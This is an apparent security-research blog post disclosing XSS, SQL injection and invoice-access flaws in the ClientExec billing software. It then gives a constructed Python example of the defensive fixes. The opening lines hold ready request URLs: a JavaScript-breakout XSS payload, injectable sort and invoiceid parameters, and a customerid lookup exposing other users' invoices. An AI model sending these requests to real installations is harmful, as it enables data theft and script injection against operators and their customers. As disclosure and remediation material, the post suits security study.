2013/05/24
So I decided to give ClientExec a try. You know what kind of try :)
Let's start with XSS:
/order.php?step=subsearch&tld=false&name=1'){}}alert('xss');function+x(){if('
Some SQLi (log in as a client and set a valid sessionHash):
/index.php?sessionHash=&fuse=billing&sort=1,2&action=GetInvoiceEntries&invoiceid=[SQLi]
/index.php?sessionHash=&fuse=billing&action=GetInvoiceList&sort=[SQLi]
/index.php?sessionHash=&fuse=billing&action=GetUnInvoicedList&sort=[SQLi]
And uhm, let's view invoices of other users:
/index.php?sessionHash=&fuse=billing&action=GetInvoiceList&customerid=[Customer]
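The three issues above are the classic trio: a reflected value landing inside a JavaScript string, a `sort`/`invoiceid` parameter concatenated into SQL, and an invoice lookup keyed on a client-supplied `customerid` instead of the session's own identity. As an added example (not ClientExec's code; the schema, rows and function names are constructed for illustration), here is how those billing endpoints look when written defensively: the sort request is mapped through an allowlist, the invoice id is bound as a parameter, ownership is checked against the session before any entries are returned, and output is escaped for the context it lands in.

```python
"""Defensive sketch of the patterns behind the endpoints above: allowlisted
sort columns, parameterised lookups, an ownership check tied to the session,
and context-aware output escaping. Constructed example, not ClientExec code."""
import html
import json
import sqlite3

# Constructed schema and sample rows; invoice 2 belongs to a different customer.
SCHEMA = """
CREATE TABLE invoices (id INTEGER PRIMARY KEY, customerid INTEGER, total REAL, paid INTEGER);
CREATE TABLE invoice_entries (id INTEGER PRIMARY KEY, invoiceid INTEGER, description TEXT, amount REAL);
INSERT INTO invoices VALUES (1, 10, 50.0, 0), (2, 11, 99.0, 1), (3, 10, 20.0, 0);
INSERT INTO invoice_entries VALUES (1, 1, 'Hosting', 50.0), (2, 2, 'Domain <b>evil</b>', 99.0), (3, 3, 'SSL', 20.0);
"""

# Only these names may appear in a sort request; anything else is rejected before
# it gets near the SQL string, so "sort=1,2" style input can never reach ORDER BY raw.
SORT_COLUMNS = {"id": "id", "total": "total", "paid": "paid"}


class Forbidden(Exception):
    """Raised when the session does not own the requested resource."""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def parse_sort(sort_param):
    """Translate a comma-separated sort request into a safe ORDER BY clause.
    A leading '-' means descending. Unknown column names raise ValueError."""
    clauses = []
    for token in sort_param.split(","):
        token = token.strip()
        if not token:
            continue
        desc = token.startswith("-")
        name = token[1:] if desc else token
        if name not in SORT_COLUMNS:
            raise ValueError("unknown sort column: %r" % name)
        clauses.append(SORT_COLUMNS[name] + (" DESC" if desc else " ASC"))
    return ("ORDER BY " + ", ".join(clauses)) if clauses else ""


def get_invoice_list(conn, session_customerid, sort_param=""):
    """List invoices for the customer bound to the session. The customer id is
    never taken from the query string, which closes the customerid= hole."""
    sql = "SELECT id, total, paid FROM invoices WHERE customerid = ? " + parse_sort(sort_param)
    return conn.execute(sql, (session_customerid,)).fetchall()


def get_invoice_entries(conn, session_customerid, invoiceid):
    """Parameterised entry lookup plus an ownership check on the parent invoice."""
    try:
        invoiceid = int(invoiceid)
    except (TypeError, ValueError):
        raise ValueError("invoiceid must be an integer")
    owner = conn.execute("SELECT customerid FROM invoices WHERE id = ?", (invoiceid,)).fetchone()
    if owner is None or owner[0] != session_customerid:
        # Same response for "missing" and "not yours" so ids cannot be enumerated.
        raise Forbidden("invoice not available to this session")
    rows = conn.execute(
        "SELECT description, amount FROM invoice_entries WHERE invoiceid = ?", (invoiceid,)
    ).fetchall()
    # Escape on output so stored markup in a description renders as text.
    return [(html.escape(desc), amount) for desc, amount in rows]


def js_string_literal(value):
    """Encode a value for insertion inside a <script> block. json.dumps produces a
    double-quoted JS string literal; '<', '>' and '&' are additionally encoded so
    the literal can never close the script tag or break out of the string."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_search_script(name):
    """Reflect the search term into a JavaScript call the safe way (hypothetical page)."""
    return "<script>showSearch(%s);</script>" % js_string_literal(name)
```

The two `sort` values accepted by `parse_sort` are column names rather than positions, so a request like `sort=1,2` is refused outright instead of being "sanitised"; the rejection is cheap to log, which also makes probing of that parameter visible in application logs.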
A lot more vulns, of different types, were found; stay tuned.